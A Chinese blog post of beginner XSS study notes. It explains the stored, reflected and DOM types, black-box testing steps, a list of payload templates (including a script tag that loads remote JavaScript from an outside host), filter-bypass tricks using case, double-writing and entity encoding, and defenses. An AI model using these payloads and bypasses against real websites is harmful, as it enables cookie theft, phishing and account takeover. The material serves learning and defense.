XSS学习笔记

最新推荐文章于 2024-07-13 15:23:40 发布
最新推荐文章于 2024-07-13 15:23:40 发布
阅读量170 收藏
点赞数 1
文章标签: xss web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44897253/article/details/121726710
版权

文章目录

1 什么是XSS

XSS(Cross Site Scripting)攻击即跨站脚本攻击。通过利用网页开发时留下的漏洞,用巧妙地方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。

2 XSS原理

攻击者在页面上插入xss代码,服务端将数据存入数据库,当用户访问到存在xss漏洞的页面时,服务端从数据库中取出数据展示到页面上,导致xss代码执行,达到攻击效果。

3 XSS分类

XSS分为三类:存储型XSS、反射型XSS、DOM型XSS

1.1 存储型

存储型XSS是持久性XSS,具有很强的稳定性。
攻击者将XSS脚本写入web应用程序的数据库,用户在使用浏览器浏览访问包含存储型XSS代码的网页时,XSS脚本就会执行,从而达到攻击的效果。

1.2 反射型

反射型XSS就是将用户输入的数据(恶意用户输入的js脚本),“反射”到浏览器执行。
通常是攻击者通过在网页上植入恶意链接,诱使用户点击,执行js脚本,从而达到攻击效果。

1.3 DOM型

DOM型XSS是通过前端JavaScript将XSS脚本写入dom节点中,从而触发XSS攻击。

4 测试方法(黑盒)

  1. 找到输入点和输出点,确认输入点提交信息是否在后台进行处理。
  2. 构造payload,通过源代码判断当前输入点的格式(部分waf会对js、文件进行混淆)。
  3. 观察闭合、过滤和拦截情况。通过script的各种过滤手段(如双写、大小写、实体编码等)模糊测试当前参数位的过滤情况。
  4. 重新构造payload。
  5. 如不成功,则重复第3、4步骤。

5 常用语句模板

<script>alert(1);</script>	//直接嵌入script
<script src=https://xsspt.com/1.js>alert|confirm|prompt(1)</script>	//从远程嵌入script
<input name=keyword value="" onmouseover="alert(1)">	//通过事件属性值传入script字符串
<input onfocus=write(1) autofocus>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<a href=javascript:alert(1)>aaa</a>	//超链接
<a href=javasc&#114;ipt:alert(1)>aaa</a>	//html实体转义

6 绕过方法

  • 大小写绕过
<sCRiPt>alert(1)</ScRipT>
  • 双写绕过
<scriptscript>alert(1)</scriptscript>
  • 编码绕过
javascrip&#x74;:alert(1)	//javascript:alert(1)
  • ()被过滤用``代替
  • 生僻函数绕过
  • 同源绕过(详情了解同源策略)

7 XSS的危害

XSS能够产生的危害依赖于浏览器客户端脚本解析引擎的能力。
1.1 技术上

  1. 窃取凭证、键盘记录、截屏、开摄像头(根据权限有几率)、获取敏感信息
  2. 篡改DOM(篡改页面布局及内容)
  3. 嵌入恶意脚本代码
  4. 发起恶意请求(Ajax)

1.2 社会影响上

  1. 无账号密码的情况下非法登录网站
  2. 网络钓鱼
  3. 网页蠕虫
  4. 破解CSRF的token限制

8 防御思路

1.1 白名单策略
使用白名单写死允许的标签和事件规则
1.2 黑名单策略(不可靠)

  1. 使用htmlspecialchars()函数,自定义预定义符号进行转义"、’、/、<、>、=,且过滤标签、时间函数名和其各种编码形式。
  2. 采用成熟的防御XSS的框架。
  3. 服务端添加http-only头下发到客户端(防止js调用cookie)、使用同源策略。
  4. 采用最新版本浏览器。

仅供个人学习。参考源自网络

yun17.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS 学习笔记(源码分析)
jieli0901227的博客
11-30 829
XSS
pikachu靶场之XSS学习笔记
Mbys_Lettuce的博客
10-01 423
XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
xss学习笔记
qq_58683895的博客
11-14 454
​ 跨站点脚本(Cross Site Scripting, XSS)是指客户端代码注入攻击,攻击者可以在合法网站或Web 应用程序中执行恶意脚本。当web 应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSS。​ 跨站脚本攻击,XSS (Cross Site Scripting)。由于与CSS (Cascading Style Sheet) 重名,所以就更名为XSS
【胎教级XSS学习笔记
az748569的博客
03-10 689
XSS漏洞大家都不陌生,作为最常见的网络安全漏洞之一,随便打开一个搜索网站,都可以找到非常多关于XSS的定义以及讲解,但是对于刚开始学习的网络安全小白比如说我来说,总是看了很多但是还一知半解,所以写这篇文章的目的是希望可以用更易于理解的方式来帮助大家理解到底什么是XSSXSS(跨站脚本攻击),那么什么是跨站脚本呢?我理解的跨站就是浏览器运行不是本网页的内容,脚本就是JS代码,所以就是网站被注入恶意的脚本了,但是浏览器还傻傻的执行了,就构成了跨站脚本攻击。
XSS学习笔记1
qq_61109509的博客
02-12 768
目录 xss(简介) javascript 插入进去的方式 xss类型 xss闯关小游戏 leval1 leval2 leval3 leval4 leval5 leval6 leval7 leval8 leval9 leval10 xss(简介) xss是跨站脚本攻击的缩写。恶意攻击者往web页面插入javascript代码,当用户浏览该页时,web里面的script就会对用户发起攻击 也就是说在css或html里面嵌入一些恶意的javascript,实现攻击目的 ja
XSS学习笔记2
qq_61109509的博客
02-12 1468
目录 leval11 leval12 leval13 leval15 leval16 leval17 leval18 Level 19,20 等学完Flash xss回来补充 大佬文章总结XSS绕过 leval11 看源码 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $s...
XSS漏洞学习笔记
qq_40096118的博客
04-21 357
XSS 攻击通常利用了 Web 应用程序中的不安全输入验证或者过滤机制,允许攻击者将恶意脚本注入到网页中,进而影响其他用户的浏览器执行该脚本。这可能导致恶意脚本偷取用户的会话 Cookie、窃取敏感信息、修改页面内容、重定向到恶意网站等危险行为,甚至利用浏览器漏洞实现更深层次的攻击。恶意脚本作为 URL 参数或表单数据的一部分发送到服务器端,服务器端将恶意脚本反射回给用户,用户的浏览器执行了这些脚本。当其他用户访问包含恶意脚本的页面时,恶意脚本会从服务器端加载并执行,造成危害。
Go Template学习笔记
06-20
Go 模板是 Go 语言标准库中的一个重要组成部分,它用于生成动态内容,尤其是在 Web 开发中用于渲染 HTML 页面。...通过学习这些基本概念和语法,你可以更好地理解和利用 Go 模板来构建高效、安全Web 应用。
Webgoat学习笔记.zip
03-12
WebGoat学习笔记WebGoat是一款由OWASP(开放网络应用安全项目)开发的在线教学平台,专门用于教授和实践网络安全中的Web应用程序漏洞。它是一个故意设计有漏洞的Web应用,帮助学习者了解并熟悉各种攻击手段,...
学习文档笔记
05-08
学习文档笔记】是一份全面涵盖前端、后端以及工具使用的学习资料集合,旨在帮助学习者巩固和深化在IT领域的知识。这份文档笔记包含了多个方面的技术内容,为个人的技能提升提供了宝贵的资源。 首先,从前端开发的...
YII学习笔记
07-30
**YII学习笔记** 在IT领域,Web开发框架是开发者们构建高效、可维护网站的重要工具,而YII就是其中的一员。这半个月的学习笔记详细记录了YII框架的基础知识和核心概念,对于初学者来说是一份宝贵的参考资料。YII,...
信息安全工程师学习笔记.rar
03-06
《信息安全工程师学习笔记》是针对软考中级信息安全工程师考试的一份详实的学习资料,这份压缩包文件包含了丰富的知识内容,旨在帮助考生系统性地理解和掌握信息安全领域的核心概念、原理和实践技能。以下将对这份...
struts2如何防止XSS脚本攻击(XSS防跨站脚本攻击过滤器)
qq_37996327的博客
07-10 244
struts2如何防止XSS脚本攻击(XSS防跨站脚本攻击过滤器)
【网络安全的神秘世界】XSS基本概念和原理介绍
weixin_54750312的博客
07-09 817
恶意攻击者往web页面插入恶意代码脚本(JS代码),当用户浏览该页面时,嵌入web里面的JS代码会被执行,从而达到恶意攻击用户的目的。也叫持久型,常见的就是在博客留言版、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端,每次访问都会触发恶意代码。我们可以构造恶意代码,观察远程服务器web日志,只要网站管理员访问,它的cookie值就被盗取。发现恶意代码被浏览器保存到页面了,访问其他网页再回来,仍会造成攻击,这就叫持久型。像刚才的攻击流程,攻击一次立马失效,这就叫非持久型。
网络安全防御【防火墙NAT智能选举综合实验】
miss_copper的博客
07-13 737
需要新创建一个源地址转池:这里我们将配置黑洞路由勾选(防止路由环路,还可以引入到OSPF等动态路由协议中发布出去),允许端口地址转换取消勾选(因为我们这里是多对多的NAT,源NAT地址转换,如果勾选了端口地址转换,就成了端口映射,成了目标NAT)这种方式可以提高安全性,因为攻击者无法预测目标设备的确切IP地址。首先修改公网client5,和分公司server5和client6的域名服务器地址,并且公网中的server4(NDS服务器)开启DNS服务,和分公司的server5开启http服务器。
java配置nginx网络安全,防止国外ip访问,自动添加黑名单,需手动重新加载nginx
最新发布
weixin_44006009的博客
07-13 89
创建一个类,自己添加一个main启动类即可测试。通过访问日志自动添加国外ip黑名单。
网络设备安全
weixin_48579910的博客
07-11 840
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
智能车存在网络安全隐患,如何应设计出更好的安全防护技术?
tigerman20201的博客
07-13 153
然而,高度的网络化和智能化也使智能车面临着严峻的网络安全挑战,如远程攻击、数据泄露和恶意控制等。未来,随着技术的不断发展,应持续加强对智能车网络安全的研究和创新,以应对不断变化的安全威胁。摘要:随着智能车技术的迅速发展,车辆的网络连接性不断增强,然而这也带来了诸多网络安全隐患。本文深入探讨了智能车面临的网络安全威胁,并提出了一系列创新的安全防护技术设计,旨在为智能车的安全运行提供更可靠的保障。黑客可以通过公共网络对智能车的通信系统进行攻击,干扰车辆的正常运行,甚至获取车辆的控制权。
xss game挑战笔记.pdf
02-11
本文档是一份关于XSS Game挑战笔记的详细记录,旨在帮助读者深入理解跨站...这份笔记不仅包含了XSS游戏挑战的实战练习,还涵盖了XSS攻击的原理、编码技巧和防护策略,适合想要提升XSS安全意识和技术能力的读者学习

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值